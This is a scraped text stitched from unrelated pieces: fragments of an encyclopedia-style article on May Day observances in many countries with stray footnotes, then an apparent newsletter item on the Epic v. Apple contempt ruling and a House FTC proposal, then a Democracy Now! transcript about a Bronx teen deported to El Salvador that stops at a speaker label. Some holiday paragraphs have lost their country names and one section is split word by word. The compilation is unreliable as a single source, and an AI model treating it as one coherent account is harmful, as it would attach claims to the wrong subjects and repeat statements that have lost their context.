International Workers' Day is now an important celebration in Italy and is a national holiday regardless of what day of the week it falls on. The Concerto del Primo Maggio ("1st of May Concert"), organized by Italian labour unions in Rome in Piazza di Porta San Giovanni, has become an important event in recent years. Every year the concert is attended by a large audience of mostly young people and involves the participation of many famous bands and songwriters, lasting from 15:00 until midnight. The concert is usually broadcast live on Rai 3.[129] A second big concert is organised in the city of Taranto and is transmitted locally by TGR Apulia.
In Lithuania, 1 May is an official public holiday celebrated as International Work Day (Lithuanian: Tarptautinė darbo diena).[130] Celebrations for Workers' Day were mandatory during the Soviet occupation, and as a result the day carries a negative connotation today. When Lithuania declared its independence in 1990, Work Day lost its public holiday status, but it regained it in 2001.[131][132]

In Latvia, Labour Day is an official public holiday, celebrated jointly as the Convocation of the Constituent Assembly of the Republic of Latvia and Labour Day.[133]
In Luxembourg, 1 May, called the Dag vun der Aarbecht ("Labour Day"), is a legal holiday traditionally associated with large demonstrations by trade unions in Luxembourg City and other cities.[134]

In Montenegro, 1 May is an official public holiday, a day off work and a day out of school. It is the only official holiday from socialist times that is still officially celebrated.[136]
In the Netherlands, 1 May or Labour Day (Dutch: Dag van de Arbeid) is not an official holiday. This is due in part to its proximity to the national holiday, Koningsdag, which until 2013 was celebrated on the day before. Labour movements also did not see the need to agitate for an extra day off during the post-World War II recovery efforts. Liberals who joined the Labour Party in this same period also wanted to distance themselves from the Soviet Union because of Cold War sentiments.[137]
In North Macedonia, 1 May (Macedonian: Ден на Трудот, Den na Trudot) is an official public holiday. Before 2007, 2 May was also a public holiday. People celebrate with friends and family at traditional picnics across the country, accompanied by the usual outdoor games, various grilled meats and beverages. Left organizations and some trade unions organize protests on 1 May.[138]
In Norway, Labour Day (Norwegian: Arbeidernes Dag) is celebrated on 1 May and has been an official public holiday since 1947.[139] It was first introduced by the workers' movement in 1890,[140] and recognized as an official flag day in 1935.[141] The programme for the day is presented by local unions and labour organizations.
In Poland, since the fall of communism, 1 May has been officially celebrated as Labour Day (Polish: Święto Pracy).[142][143] It is customary for labour activists to organize parades in cities and towns across Poland.

Labour Day is closely followed by May 3rd Constitution Day, and the two dates combined often result in a long weekend called Majówka, which may last for up to 9 days, from 28 April to 6 May, at the cost of taking only 3 days off. People often travel, and Majówka is unofficially considered the start of the barbecuing season in Poland. Between the two holidays, on 2 May, there is a patriotic holiday, the Day of the Polish Flag (Dzień Flagi Rzeczypospolitej Polskiej), introduced by a parliamentary act of 20 February 2004; it does not, however, grant paid time off.
In Portugal, Workers' Day (Portuguese: Dia do Trabalhador) on 1 May was suppressed during the Estado Novo dictatorship. The first Workers' Day demonstration was held a week after the Carnation Revolution of 25 April 1974; it is still the largest demonstration in the history of Portugal. The day is used as an opportunity for workers and workers' groups to voice their discontent over working conditions in demonstrations across Portugal, the largest being held in Lisbon. It is an official public holiday.[144]
Delegates of the Romanian Communist Party on 1 May 1965
In Romania, 1 May, known as "International Labour Day" (Romanian: Ziua internațională a muncii), "International Workers' Day" (Ziua internațională a muncitorilor), or simply "1/First of May" (1/Întâi Mai), is an official public holiday. During the communist regime, as in all former Eastern Bloc countries, the day was marked by large state-organized parades in most towns and cities. After the Romanian Revolution of 1989, 1 May continued to be an official public holiday, but without any state-organized events or parades. Most people celebrate together with friends and family, organising picnics and barbecues. It is also the first day of the year when people, especially those from the southeastern part of the country, including the capital Bucharest, go to spend the day in one of the Romanian Black Sea resorts.
Russian Communist Workers' Party demonstration on 1 May 2008 in Izhevsk

In Russia, the "Day of International Workers' Solidarity, the 1st of May" (Russian: День международной солидарности трудящихся Первое ма́я) was celebrated illegally in the country until the February Revolution enabled the first legal celebration, in 1917. The following year, after the Bolshevik seizure of power, the International Workers' Day celebrations were boycotted by Mensheviks, Left Socialist Revolutionaries and anarchists. It became an important official holiday of the Soviet Union, celebrated with elaborate popular parades in the centres of the major cities. The biggest celebration was traditionally organized in Red Square, where the General Secretary of the CPSU and other party and government leaders stood atop Lenin's Mausoleum and waved to the crowds. Until 1969, the holiday was marked by military parades throughout the Russian SFSR and the union republics.
In 1991, the year before the last such demonstrations were held in Red Square, International Workers' Day grew into high-spirited political action: around 50,000 people participated in a rally in Red Square, after which the tradition was interrupted for 13 years. In the early post-Soviet period the holiday turned into massive political gatherings of supporters of radically minded politicians. For instance, an action dubbed "a rally of communist-oriented organisations" was held in Red Square in 1992. The rally began with a performance of the Soviet anthem and the raising of the Red Flag, and ended with appeals from the leader of the opposition movement Working Moscow, Viktor Anpilov, "for early dismissal of President Boris Yeltsin, ousting Moscow Mayor Gavriil Popov from power and putting the latter on trial". Since 1992, International Workers' Day has officially been called "Spring and Labor Day", and it remains a major holiday in present-day Russia.
During the 1 May 1993 demonstration in Moscow, after the demonstrators broke through the cordon, OMON went on a counterattack near house 37 on Leninsky Avenue. "The demonstrators fought fiercely using banner poles." To overcome the barriers, the demonstrators used trucks as rams; one of these ramming attempts resulted in severe injuries to OMON Sergeant Vladimir Tolokneyev, who died four days later. Media reports on the number of victims varied: the initial figure of 150 people soon quadrupled.[149]
1 May is celebrated annually by communists, anarchists, and other organizations as the Day of International Solidarity of Workers. These events are accompanied by sharp social and political slogans ("Government of bankrupts - resign!", "WE do not want to pay for YOUR crisis!", "Self-organization! Self-government! Self-defense!", etc.).[150][151] The slogans of official events organized by the authorities are far from the historical roots of the Labour Day demonstrations: "Putin's plan is a plan for Victory!", "Bonuses for pensioners", "Three kids in a family is the norm!".[154]

A more radical attitude to the holiday was expressed in 2009 by the head of the metropolitan branch of the Right Cause party, Igor Trunov: "To be honest, I didn't really want to celebrate 1 May, because I don't stand in solidarity with the workers of Chicago, where this holiday came from."[155]

On 1 May 2013, several hundred thousand workers took to the streets of Russian cities; more than 100,000 people took part in the Labour Day demonstration in Moscow.[156]
Since 2014, a national civil parade has been held on 1 May on Red Square, with similar events held in major cities and regional capitals. In 2016, the celebrations of Easter and Labour Day overlapped,[157] which led to the abandonment of Labour Day events in some regions.[158]
In Serbia, 1 May (and also 2 May) is a day off work and a day out of school. It is one of the major popular holidays, and the only official holiday from socialist times that is still officially celebrated. People celebrate it all over the country; by tradition, 1 May is marked by countryside picnics and outdoor barbecues, and May brings warm weather to Serbia. In Belgrade, the capital, most people go to Avala or Košutnjak, parks located in Rakovica and Čukarica, and people travel around the country to enjoy nature. A major religious holiday, Djurdjevdan, falls on 6 May, so days off work are quite often given to connect the two holidays and the weekend, creating a small spring break. 1 May is celebrated by most of the population regardless of political views.
In Slovenia, 1 May and 2 May are public holidays, and there are many official events all over the country to celebrate Workers' Day. In Ljubljana, the capital, the main celebration is held on Rožnik Hill in the city. On the night of 30 April, bonfires are traditionally burned.[160]
In Spain, the first Workers' Day (Día del Trabajador) was celebrated in 1889, but it only became a public holiday with the beginning of the Spanish Second Republic in 1931. It was banned by the Franco regime in 1937.[161] The year after, it was decreed that the "Fiesta de la Exaltación del Trabajo" (Labour Festival) be held instead on 18 July, the anniversary of the Francoist military coup.[162] After the death of Francisco Franco in 1975 and the move towards democracy, the first large rallies on 1 May began again in 1977, and the day was re-introduced as a public holiday in 1978.[163] Commonly, peaceful demonstrations and parades occur in major and minor cities.[164][165]
Recognizing the central contributions of workers and of international worker solidarity to Swedish social, economic, political and cultural development, International Workers' Day demonstrations are an important part of Swedish politics and culture for social democrats, left parties, and unions. In Stockholm, the Social Democratic Party always marches towards Norra Bantorget, the historical and physical centre of the Swedish labour movement, where it holds speeches in front of the headquarters of the Swedish Trade Union Confederation, while the smaller Left Party marches in larger numbers[166] towards Kungsträdgården.
In Switzerland, the status of 1 May differs depending on the canton and sometimes on the municipality. Labour Day is known as Tag der Arbeit in the German-speaking cantons, as Fête du travail in the French-speaking cantons, and as Festa del lavoro in the Italian-speaking canton of Ticino.

In the cantons of Basel-Landschaft, Basel-Stadt, Jura, Neuchâtel, and Zürich, Labour Day is an official public holiday equal to Sundays, based on federal law (Bundesgesetz über die Arbeit in Industrie, Gewerbe und Handel, article 20a). In the cantons of Schaffhausen, Thurgau, and Ticino, Labour Day is an official "day off" (Ruhetag); this is equal in practice to an official public holiday, but is not based on federal law, and cantonal regulations may differ in the details. In the canton of Solothurn it is an official half-day holiday (starting at 12 noon). In the canton of Fribourg, public servants get the afternoon off, and many companies follow this practice. In the canton of Aargau it is not an official holiday, but most employees get the afternoon off.

In the municipalities of Hildisrieden and Schüpfheim (both in the canton of Lucerne) as well as in Muotathal (canton of Schwyz), 1 May is an official public holiday, but as the commemoration day of the local patron saint, not as Labour Day. In the other parts of the cantons of Lucerne and Schwyz, and in all other cantons, 1 May is a regular work day.[171]

The largest Labour Day celebrations in Switzerland are held in the city of Zürich. Each year, Zürich's 1 May committee, together with the Swiss Federation of Trade Unions, organizes a festival and 1 May rally; it is the largest rally held on a regular basis in Switzerland.[172]
Istanbul May Day clashes in 2013

Workers marching to Taksim Square, 1 May 2012
1 May is an official holiday celebrated in Turkey. It was a holiday known as "Spring Day" until 1981, when it was cancelled after the 1980 coup d'état. In 2009, the Turkish government restored the holiday after casualties and demonstrations. Taksim Square is the centre of the celebrations due to the Taksim Square massacre.

Workers' Day was first celebrated in 1912 in Istanbul and in 1899 in İzmir. After the establishment of the Turkish Republic in 1923, the celebrations continued, but in 1924 and 1925 they were forbidden by decree of the Kemalist government and demonstrations were suppressed. In 1935, the National Assembly declared 1 May a public holiday as "Spring Day".[173]

During the events leading up to the 1980 Turkish coup d'état, a massacre occurred on 1 May 1977 (the Taksim Square massacre), in which unknown persons (agents provocateurs) opened fire on the crowd. The crowd was the biggest in Turkish workers' history, numbering approximately 500,000 people. In the following two years, provocations and confusion continued and peaked before the 1980 coup d'état, after which the 1 May holiday was cancelled. Still, demonstrations continued with small crowds, and in 1996 three people were killed by police bullets, and a plain-clothes man who had been spying in the crowd was revealed and lynched by workers. On the same evening, a video broadcast on TV showed that two participants in the demonstration were lynched by far-right nationalist groups in front of police forces who watched the scene. 1 May 1996 has thus been remembered by workers' movements.[173]

In 2007, the 30th anniversary of the Taksim Square massacre, leftist workers' unions wanted to commemorate the massacre in Taksim Square. Since the government would not let them into the square, 580-700 people were detained, and one person died under police control. After these events, the government declared 1 May "Work and Solidarity Day", but not a holiday. The next year, the day was declared a holiday, but people were still not allowed to gather in Taksim Square.[174] The year 2008 was remembered for police violence in Istanbul: police fired tear gas grenades into the crowds, and into hospitals and a primary school. Workers nonetheless pushed forward, so that in 2010, 140,000 people gathered in Taksim, and in 2011 there were more than half a million demonstrators.

After three years of peaceful meetings, in 2013 meetings in Taksim Square were forbidden by the government. Clashes occurred between police and workers; water cannon and tear gas were widely used.[175]
International Workers' Day is a public holiday in Ukraine, inherited from the Soviet era. Celebrating 1 May as a day of workers' solidarity in Kyiv began as early as 1894.[176] Until 2018, 2 May was also a public holiday (as in the Soviet era); instead, in 2017, Western Christianity's Christmas, celebrated on 25 December, became a new Ukrainian public holiday.[177][178] The 1 May International Workers' Day remained a Ukrainian public holiday, although in 2017 it was renamed from "Day of International Solidarity of Workers" to "Labour Day".[178] According to Interior Minister Arsen Avakov, during the 2016 International Workers' Day rallies in some major cities the police officers far outnumbered the rally participants,[181] with 193 policemen protecting 25 rally participants in Dnipro.[181]
New Zealand workers were among the first in the world to claim the right to an eight-hour working day when, in 1840, the carpenter Samuel Parnell[187] won an eight-hour day in Wellington. Labour Day was first celebrated in New Zealand on 28 October 1890,[188] and falls every year on the fourth Monday of October.
In Bangladesh, 1 May is a public holiday called International Workers' Solidarity Day. A parade and other events are held on the day to commemorate the occasion.[189]
In India, Labour Day is not a public holiday on 1 May.[190] International Workers' Day is tied to the labour movements of the communist and socialist political parties. Labour Day is known as "Uzhaipalar dhinam" in Tamil (and was first celebrated in Madras), "Kamgar Din" in Hindi, "Karmikara Dinacharane" in Kannada, "Karmika Dinotsavam" in Telugu, "Kamgar Divas" in Marathi, "Thozhilaali Dinam" in Malayalam and "Shromik Dibosh" in Bengali. Since Labour Day is not a national holiday, it is observed as a public holiday at each State Government's discretion; in many parts of the country, especially the North Indian states, it is not a public holiday.[191]
The Labour Kisan Party introduced May Day celebrations in Madras, at a meeting presided over by Comrade Singaravelar. A resolution was passed stating that the government should declare May Day a holiday, and the president of the party explained the party's non-violent principles. There was a request for financial aid, and it was emphasised that the workers of the world must unite to achieve independence.
1 May is also celebrated as "Maharashtra Day"[195] and "Gujarat Day" to mark the date in 1960 when the two western states attained statehood after the erstwhile Bombay State was divided on linguistic lines. Maharashtra Day is held at Shivaji Park in central Mumbai, and schools and offices in Maharashtra remain closed on 1 May. A similar parade is held to celebrate Gujarat Day in Gandhinagar.
The Maldives first observed the holiday in 2011, after a declaration by President Mohamed Nasheed. He noted that this move highlighted the government's commitment, as well as the efforts of private parties, to protect and promote workers' rights in the Maldives.[197]
International Workers' Day has been celebrated in Nepal since 1963.[198] The day became a public holiday in 2007.[199]
International Labour Day is observed in Pakistan on 1 May to commemorate the social and economic achievements of workers. It is a public and national holiday. Many organized street demonstrations take place on Labour Day, where workers and labour unions protest against labour repression and demand more rights, better wages and benefits.[200]
In Sri Lanka, International Workers' Day was declared a public, bank, and mercantile holiday in 1956.[201] The government has held official celebrations in major towns and cities, with the largest being in the capital, Colombo. During celebrations, it is common to see party leaders greeting the crowds. Workers frequently carry banners with political slogans, and many parties decorate their vehicles.
In Cambodia, it is known as International Labour Day and is a public holiday.[202] No marches for Labour Day were permitted in Cambodia for several years after the 2013 Cambodian general election and the surrounding mass protests. A tightly controlled march on a limited scale was first permitted again in 2019.[203]
Protest march in Jakarta, Indonesia, 1 May 2007
International Workers' Day, or Labour Day, in Indonesia was first observed by the Kung Tang Hwee labour union in Semarang in 1918. Organizations such as Sarekat Islam, Boedi Oetomo, and Insulinde also took part in a strike that day through the Radicale Concentratie alliance, but in 1927 the celebrations were banned by the Dutch East Indies colonial government.[204] After independence, 1 May was observed as Labour Day again from 1946, with Soekarno, the first president of the Republic, always attending the celebration; two years later he signed Law No. 12 of 1948 concerning workers' rights. Soeharto's New Order regime banned the celebration again from 1967 because of the day's association with Marxist and communist movements, and from 1973 moved Labour Day to 20 February, the day on which all the labour unions had been merged by the government into a single federation.[205] After the fall of the New Order, the day was again celebrated as a rally day of labourers and workers, and it was officially made a public holiday from 2014. Every year on the day, labourers take to the streets in major cities across the country, voicing their demands for better income and supportive policy from the ministries.[206]
In Myanmar, 1 May is known as Labour Day (Burmese: အလုပ်သမားနေ့) and is a public holiday.[208]
1 May is known as "Labor Day" (
Filipino
:
Araw ng Manggagawa
, also known as
Araw ng Paggawa
) and is a
public holiday in the Philippines
. On this day, labour organizations and unions hold protests in major cities. On 1 May 1903, during the
American colonial period
the
Unión Obrera Democrática Filipina
(Filipino Democratic Labor Union) held a rally in front of the
Malacañang Palace
demanding workers' economic rights and Philippine independence. In 1908, the
Philippine Assembly
passed a bill officially recognizing 1 May as a national holiday. In 1913, the first official celebration was held on 1 May 1913 when 36 labour unions convened for a congress in
Manila
.
[
209
]
During the
Presidency of Gloria Macapagal-Arroyo
, a policy was adopted called
holiday economics
policy that moved holidays to either a Monday or a Friday to create a
long weekend
of three days. In 2002, Labor Day was moved to the Monday nearest to 1 May. Labour groups protested, as they accused the Arroyo administration of belittling the holiday.
[
210
]
By 2008, Labor Day was excluded in the holiday economics policy, returning the commemorations to 1 May, no matter what day of the week it falls on.
[
1
]
On 1 May 1946, the first International Labour Day of the Democratic Republic of Vietnam was held.[213] According to the decree, "workers in public offices, private offices and factories throughout the country are entitled to a day off from work on International Labour Day, 1 May, and still receive the same salary as for a working day…".[213]
In Bahrain, 1 May is known as Labour Day and is a public holiday.[214]

In Iran, 1 May is known as International Workers' Day. It is not a public holiday, but according to article 63 of Iranian labour law, on top of the official public holidays observed in the Islamic Republic of Iran, Labour Day shall be considered an official holiday for workers.[215]

In Iraq, it is known as International Workers' Day and is a public holiday.[216]

Israel, 1 May 2007

After historically varying popularity of Labour Day, 1 May is not an official holiday in the State of Israel. In the 1980s there were several large marches in Tel Aviv, numbering as many as 350,000 in 1983 and perhaps even more in 1988, but a steady decline in numbers led to only 5,000 marchers in 2010. During the 1990s, businesses began to treat it like a regular working day as the number of Labour Day-related activities decreased.[217] 1 May is largely celebrated by the former Soviet Jews who immigrated to Israel in the 1990s.

1 May is known as Labour Day and is a public holiday.[218]

1 May is known as Workers' Day and is a public holiday. Left-wing parties and workers' unions organize marches on 1 May.[219]
^ I saw a man, whom I afterwards identified as Fielding [sic], standing on a truck wagon at the corner of what is known as Crane's Alley. I raised my baton and, in a loud voice, ordered them to disperse as peaceable citizens. I also called upon three persons in the crowd to assist in dispersing the mob. Fielding got down from the wagon, saying at the time, "We are peaceable," as he uttered the last word, I heard a terrible explosion behind where I was standing, followed almost instantly by an irregular volley of pistol shots in our front and from the sidewalk on the east side of the street, which was immediately followed by regular and well directed volleys from the police and which was kept up for several minutes. I then ordered the injured men brought to the stations and sent for surgeons to attend to their injuries. After receiving the necessary attention most of the injured officers were removed to the County Hospital and I highly appreciate the manner in which they were received by Warden McGarrigle who did all in his power to make them comfortable as possible.[21]

^ "In 1884 the first Monday in September was selected as the holiday, as originally proposed."[26]

^ "The first day of May each year shall be designated as Workers' Day, which shall be a paid holiday under the 'Labor Standards Act'."[103]

^ The clashes were preceded by two circumstances: "the organizers deviated from the route allowed by the mayor's office," and the Moscow authorities decided to "obstruct the movement of the column along Leninsky Avenue." Subsequently, the authorities failed to rationally justify that decision: the movement took place in the direction away from the city center. The version that "the demonstrators are going to smash Gorbachev's dacha" remained unconfirmed. The demonstrators, who were moving along Leninsky Avenue from Oktyabrskaya Square, noticing the truck barriers as well as the cordon of police officers and OMON, reorganized, putting forward a vanguard of 500-600 people, the most organized part of which was the squad of the National Salvation Front. A few tens of meters before the cordon, the column stepped up its pace and almost immediately broke through it. See the cited report by Memorial.
^ The Penguin Encyclopedia. Penguin Books. 2004. p. 860. "Labour / Labor Day: A day of celebration, public demonstrations, and parades by trade unions and labour organizations, held in many countries on 1 May or the first Monday in May."
^ "Labour Day 2024". Times of India. 1 May 2024. "International Workers' Day, which is also called Labour Day or May Day, is celebrated in many countries ... In India, Labour Day or May Day is celebrated on May 1 every year; while some countries mark this on the first Monday in May."
^ Hobsbawm, Eric (10 July 2009). "Birth of a Holiday: The First of May". libcom.org. Archived from the original on 21 June 2021. Retrieved 26 April 2021. "In fact, the question was to be formally discussed at the Brussels International Socialist Congress of 1891, with the British and Germans opposing the French and Austrians on this point, and being outvoted."
^ a b The Bridgemen's Magazine. International Association of Bridge, Structural and Ornamental Iron Workers. 1921. pp. 443–44. Archived from the original on 1 May 2023. Retrieved 4 September 2011.
^ "调与休：黄金周长假的变迁" [Reconcile and rest: the change of Golden Week vacation]. People's Daily (in Chinese). Xinhua News Agency. 27 November 2013. Archived from the original on 13 April 2022. Retrieved 13 April 2022. "[Starting from the National Day holiday in 2000, the vacation time of the three festivals (National Day, Spring Festival and Labor Day) was adjusted uniformly, moving the two weekends before and after the holiday (four days) together with the three days of legal holiday into one concentrated vacation, for a total of 7 days [...] In 2008, the May Day legal holiday was changed from 3 days to 1 day, meaning that the May Day Golden Week was cancelled.]"
^ ""五一"假期延长至5天 解读黄金周背后的假如" ["May Day" holiday extended to 5 days: Explaining the assumptions behind the Golden Week]. Xinhuanet (in Chinese). Chengdu Business News. 28 November 2019. Archived from the original on 13 April 2022. Retrieved 13 April 2022. "[In 2020, on the basis of the continuation of the 2019 "May Day" vacation arrangement, it was further expanded by adding one more day of holiday through rescheduled rest days, forming a 5-day "mini long holiday".]"
^ "新闻背景：香港回归15年大事记" [News Background: Events in the 15 years since Hong Kong's return to China] (in Chinese). China News Service. 1 July 2012. Archived from the original on 2 July 2012. Retrieved 1 May 2024.
^ Schedule for May 1 Labour Day march and two rival meetings in downtown Reykjavík. However, many stores nowadays are open on this day and instead pay higher salaries to the workers.
^ Quinn, Ruairí (9 July 1993). "Vote 44: An Chomhairle Ealaíon". Dáil Éireann Debates. Oireachtas. Vol. 433, No. 8, p. 61, c. 2084. Archived from the original on 8 May 2018. Retrieved 8 May 2018. "The Programme for a Partnership Government also committed the Government to appoint the first Monday in May to be a public holiday with effect from 1994, in recognition of the centenary of the foundation of the Irish Trades Union Congress. In deciding to introduce a new public holiday, the Government also took account of the fact ... that nine of our EC partners have a public holiday early in May."
^ "Public holidays". Dublin: Citizens Information Board. 20 March 2018. Archived from the original on 17 November 2010. Retrieved 8 May 2018.
^ Gjerde, Åsmund Borgen; Thingsaker, Bjørn (2 May 2021). "Første mai" (in Norwegian). Archived from the original on 4 May 2021. Retrieved 3 May 2021 - via Store norske leksikon.
^ M.V.S. Koteswara Rao. Communist Parties and United Front - Experience in Kerala and West Bengal. Hyderabad: Prajasakti Book House, 2003. p. 110.
^ Report of May Day Celebrations 1923, and Formation of a New Party. The Hindu, quoted in Murugesan, K.; Subramanyam, C.S. Singaravelu, First Communist in South India. New Delhi: People's Publishing House, 1975. p. 169.
^ "2019". bot.or.th. Archived from the original on 1 May 2020. Retrieved 16 October 2019.
^ a b c d e Nguyễn Thu Hoài (21 January 2018). "Người lao động Việt Nam được nghỉ ngày 1.5 từ bao giờ?" (in Vietnamese). Trung tâm Lưu trữ quốc gia I (National Archives No. 1, Hanoi), Cục Văn thư và Lưu trữ nhà nước (State Records and Archives Management Department of Vietnam). Archived from the original on 16 July 2022. Retrieved 4 February 2022.
Ok, two quick pieces of good news. The first is that a judge in Northern California, Yvonne Gonzalez Rogers, issued a very harsh rebuke to Apple over its control of the iPhone app store. The order is part of a long-standing antitrust case brought by Epic Games against Apple in 2020.
In 2021, Epic Games lost on the Federal antitrust charges, but won on a state claim of unfair conduct, specifically over its refusal to let app developers communicate with or give consumers a place outside of the app store to pay for apps. The judge found that Apple’s conduct “allowed it to reap supracompetitive operating margins,” and ordered it to let app developers communicate with customers and buy apps outside the App store. The case went on appeal, with the Ninth Circuit upholding the decision and order. In January of 2024, the Supreme Court refused to hear the appeal, and Gonzalez Rogers’s order went into effect.
Since then, Apple has engaged in bad faith tactics to avoid complying. Today, Gonzalez Rogers sanctioned the company and ordered Apple to allow app developers to sell their apps outside of the App Store without a fee. That’s a huge deal. For some context, the New York Times says that app store fees make up “a large portion of the nearly $100 billion in annual services revenue that Apple collects.”
Epic’s CEO was jubilant, explaining what the decision means.
That’s not all. For a year and a half, Apple has engaged in bad faith, levying a variety of different and new fees to app developers to get around the spirit of the judicial order. It put up scare screens, engaged in sleazy privilege claims, and lied under oath to the judge about its decision-making. Normally these kinds of tactics happen without consequence for important business executives. But this time, the judge accused Apple Vice-President of Finance, Alex Roman, of having “outright lied under oath,” and referred the matter to the U.S. Attorney for a criminal contempt investigation. She also went out of her way to blame Apple CEO Tim Cook directly.
It’s really worth reading these two full paragraphs of the judge’s decision.
In stark contrast to Apple’s initial in-court testimony, contemporaneous business documents reveal that Apple knew exactly what it was doing and at every turn chose the most anticompetitive option. To hide the truth, Vice-President of Finance, Alex Roman, outright lied under oath. Internally, Phillip Schiller had advocated that Apple comply with the Injunction, but Tim Cook ignored Schiller and instead allowed Chief Financial Officer Luca Maestri and his finance team to convince him otherwise. Cook chose poorly. The real evidence, detailed herein, more than meets the clear and convincing standard to find a violation. The Court refers the matter to the United States Attorney for the Northern District of California to investigate whether criminal contempt proceedings are appropriate.
This is an injunction, not a negotiation. There are no do-overs once a party willfully disregards a court order. Time is of the essence. The Court will not tolerate further delays. As previously ordered, Apple will not impede competition. The Court enjoins Apple from implementing its new anticompetitive acts to avoid compliance with the Injunction. Effective immediately Apple will no longer impede developers’ ability to communicate with users nor will they levy or impose a new commission on off-app purchases.
Now that is brutal. Apple says it will comply, though it will also appeal the decision. That means tomorrow, developers will have a bunch of new options for how to sell apps; the whole app economy could change if the Ninth Circuit doesn’t issue a stay of the order, meaning that this decision is the first time we’ll see a big tech remedy in an antitrust case actually make a serious real-world difference.
And here’s a headline that puts a fine point on what happened.
And now on to the second piece of good news. On Monday, I traced a proposal from Republican leader Jim Jordan, who chairs the House Judiciary Committee, to eliminate a key antitrust law, which is the Federal Trade Commission’s authority to ban “unfair methods of competition.” That’s the authority used in several important cases, including one involving Amazon, another targeting UnitedHealth Group and CVS, as well as a seed and chemical case where the defendants are Corteva and Syngenta. The committee hearing was today, and Jordan ultimately pulled the proposal.
Jordan was seeking to hide a significant change to antitrust underneath a procedural shift. His legislation would have merged the FTC’s competition division into the Department of Justice Antitrust Division, which sounds like some boring bureaucratic reshuffling, but it’s not. The trick is that though both enforcers apply the Sherman and Clayton Acts, they also have different authorities. The FTC can go beyond the Sherman and Clayton Acts, barring “unfair methods of competition” that don’t quite meet the standards of the other antitrust laws. And when Jordan put out text folding the FTC staff and resources into the Antitrust Division, he didn’t move the FTC’s extra authority to the Antitrust Division. So it was a tricky way to kill this authority, and harm the cases based on it.
In other words, it was a sneak attack. It makes sense why he’d try it this way; changing antitrust law is very hard. You need to pass it out of the House of Representatives with a majority, and then get 60 votes in the Senate. Jordan’s approach was to short-circuit this path by attaching this legislation to the much bigger tax cut bill moving forward, the hope being no one would really notice. Such an approach had two advantages. First, while individual Congressmen might not like each particular component of such a bill, most wouldn’t sink the whole thing over a shift of this authority. And second, the tax bill, for boring reasons, only requires 50 votes in the Senate.
Jim Jordan is a conservative Republican leader who is very well-respected on the right. But in this case, he stepped on a rake. Our work set off a bit of a firestorm. First, a host of former antitrust enforcers expressed concern, pointing out that the legislation wasn’t just a harmless set of seating chart changes. Naturally, the Democrats were not on board with rolling back antitrust law and weakening the FTC, with Congresswomen Becca Balint and Pramila Jayapal speaking out in the committee markup. That was important, though expected.
What was *not* expected was opposition from populist right and small business groups. Yesterday, Steve Bannon went on his show
War Room
with Mike Davis, a conservative anti-big tech foe. The two of them absolutely laid into Jordan for taking the side of firms like Meta and Google, and in their view undermining the Trump antitrust agenda. A lot of War Room listeners presumably called into Republican offices.
But that’s not all. There are a lot of business people, like pharmacists, app developers, grocers, and farmers, who rely on the increasingly active antitrust enforcement regime. And some of them no doubt started getting in contact with GOP members on the committee. It’s rare for trade associations to move particularly quickly, but the National Grocers Association, which leads a coalition seeking to revive price discrimination laws, put out a note of concern.
Anyway, the net effect is that today, at the committee markup, Jordan quietly announced some technical changes to the bill. One of them was to eliminate the FTC provisions.
So there we go. The campaign against monopoly keeps rolling on, and I keep being surprised by how many wins we chalk up.
"They Shattered Our Dreams": NY Father Recounts How ICE Snatched His Son & Sent Him to El Salvador
Democracy Now!
www.democracynow.org
2025-05-01 13:24:56
As May Day protests call for worker and immigrant rights, we talk to a New York father whose 19-year-old son Merwil Gutiérrez, with an open asylum case, was detained in the Bronx and then flown with over 230 other Venezuelans to a mega-prison in El Salvador, where he is being held incommunicado. Wit...
This is a rush transcript. Copy may not be in its final form.
AMY GOODMAN: This is Democracy Now!, democracynow.org. I’m Amy Goodman, with Nermeen Shaikh.
NERMEEN SHAIKH: May Day demonstrations are underway worldwide, with mass protests across the United States today focused on workers’ rights and resistance to the Trump administration’s crackdown on immigrants and asylum seekers, including the transfer of over 230 men to El Salvador’s Terrorism Confinement Center, CECOT, infamous for its human rights abuses.
The protests come amid reports the Trump administration is seeking to send immigrants with criminal records to Rwanda and Libya. That’s according to CNN, which also reports the U.S. is seeking to send some asylum seekers apprehended at the U.S. border to Libya, including people with no criminal records.
This is Secretary of State Marco Rubio speaking at a Cabinet meeting Wednesday, sitting next to President Trump.
SECRETARY OF STATE MARCO RUBIO:
We are actively searching for other countries to take people from third countries. So we are actively — not just El Salvador — we are working with other countries to say, “We want to send you some of the most despicable human beings to your countries. Will you do that as a favor to us?” And the further away from America, the better, so they can’t come back across the border.
NERMEEN SHAIKH:
This week, President Trump said he has the power to bring back Maryland father Kilmar Abrego Garcia, who the U.S. government admitted to expelling to an El Salvador prison “in error,” but that he will not do so, despite court orders.
It’s been two months since the Trump administration rounded up and transferred 238 Venezuelan immigrants from the U.S. to the notorious maximum-security mega-prison in El Salvador. The men are being held incommunicado, without access to their attorneys or relatives, languishing in what appears to be indefinite detention in CECOT.
AMY GOODMAN:
This week, Democracy Now! spoke to the father of a 19-year-old Venezuelan teenager who is among them. His name is Merwil Gutiérrez. He was detained by Immigration and Customs Enforcement, ICE, agents outside his apartment here in New York in the Bronx on February 24th. He was sent to El Salvador despite having an open asylum case in the U.S. Merwil’s family and lawyers note he has no criminal history, no tattoos — one of the features Trump officials have used to wrongfully accuse Venezuelan immigrants and others of being gang members and to expel them from the country without due process under the wartime Alien Enemies Act of 1798.
Merwil’s cousin, Luis Acosta, witnessed the February arrest from his window. He described seeing at least 10 officers ambushing Merwil and questioning him. His cousin says authorities were searching for a different person, but they forcibly took Merwil away anyway, knowing he was not that person. One of the officers grabbed the teen by the arm and put him inside a car. Merwil’s father, Wilmer Gutiérrez, says he’s been unable to communicate with his son since he was taken to an ICE jail in Texas, then transferred to El Salvador in March.
Democracy Now!'s Juan González and I spoke with Wilmer Gutiérrez through a translator. We were also joined by Ethar El-Katatney, editor-in-chief of Documented, a nonprofit newsroom focusing on New York's immigrant community, that broke Merwil’s story in a report headlined “ICE Took His Son from Their Bronx Home. Now His 19-Year-Old Is in Bukele’s Mega-Prison in El Salvador.” It was written by Paz Radovic. I began by asking Wilmer Gutiérrez to describe what happened to his son.
WILMER GUTIÉRREZ:
[translated] Good morning. My name is Wilmer. I am Merwil Gutiérrez’s father. The day he was arrested, he was entering the building where we live. That day, I was working, and my nephew called me and told me that my son was being grabbed by the police to take him away, without explanation. They were apparently looking for another person, and they grabbed my son, handcuffed him and put him in the car. One of the policemen asked him his name. He replied that it is Merwil. And the policeman said, “No, he’s not who we want.” Since the good ones are the bad ones, too, the other police said, “No, take him anyway.” And they took my son to the precinct. I returned to the precinct. I thought that he was going to be released that same night and they were going to let him go back home, because I know my son was not doing anything wrong. He was just going into our building when they arrested him.
JUAN GONZÁLEZ:
